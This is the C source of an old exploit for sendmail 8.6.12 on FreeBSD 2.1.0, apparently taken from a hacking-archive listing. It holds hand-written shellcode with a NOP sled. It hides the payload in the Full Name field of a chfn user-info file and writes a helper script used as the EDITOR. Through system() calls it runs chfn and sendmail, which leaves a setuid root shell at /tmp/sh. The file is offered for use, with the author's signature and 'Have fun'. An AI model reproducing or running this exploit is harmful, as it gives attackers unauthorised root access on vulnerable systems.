home *** CD-ROM | disk | FTP | other *** search
- /* Hi ! */
- /* This is exploit for sendmail bug (version 8.6.12 for FreeBSD 2.1.0). */
- /* If you have any problems with it, send letter to me. */
- /* Have fun !
- /* ----------------- Dedicated to my beautiful lady ------------------ */
- /* Leshka Zakharoff, 1996. E-mail: leshka@chci.chuvashia.su
-
- #include <stdio.h>
- main()
- {
- void make_files();
- make_files();
- system("EDITOR=./hack;export EDITOR;chmod +x hack;chfn;/usr/sbin/sendmail;
- echo See result in /tmp");
- }
-
- void make_files()
- {
- int i,j;
- FILE *f;
- char nop_string[200];
- char code_string[]=
- {
- "\xeb\x50" /* jmp cont */
- /* geteip: */
- "\x5d" /* popl %ebp */
- "\x55" /* pushl %ebp */
- "\xff\x8d\xc3\xff\xff\xff" /* decl 0xffffffc3(%ebp) */
- "\xff\x8d\xd7\xff\xff\xff" /* decl 0xffffffd7(%ebp) */
- "\xc3" /* ret */
- /* 0xffffffb4(%ebp): */ "cp /bin/sh /tmp"
- /* 0xffffffc3(%ebp): */ "\x3c"
- "chmod a=rsx /tmp/sh" /* 0xffffffd7(%ebp): */
- "\x01"
- "-leshka-leshka-leshka-leshka-" /* reserved */
- /* cont: */
- "\xc7\xc4\x70\xcf\xbf\xef" /* movl $0xefbfcf70,%esp */
- "\xe8\xa5\xff\xff\xff" /* call geteip */
- "\x81\xc5\xb4\xff\xff\xff" /* addl $0xb4ffffff,%ebp */
- "\x55" /* pushl %ebp */
- "\x55" /* pushl %ebp */
- "\x68\xd0\x77\x04\x08" /* pushl $0x80477d0 */
- "\xc3" /* ret */
- "-leshka-leshka-leshka-leshka-" /* reserved */
- "\xa0\xcf\xbf\xef"
- };
-
- j=269-sizeof(code_string);
- for(i=0;i<j;nop_string[i++]='\x90');
- nop_string[j]='\0';
-
- f=fopen("user.inf","w");
- fprintf(f,"#Changing user database information for leshka\n");
- fprintf(f,"Shell: /usr/local/bin/bash\n");
- fprintf(f,"Location: \n");
- fprintf(f,"Office Phone: \n");
- fprintf(f,"Home Phone: \n");
- fprintf(f,"Full Name: %s%s\n",nop_string,code_string);
- fclose(f);
-
- f=fopen("hack","w");
- fprintf(f,"cat user.inf>\"$1\"\n");
- fprintf(f,"touch -t 2510711313 \"$1\"\n");
- fclose(f);
- }
- /* www.hack.co.za [2000]*/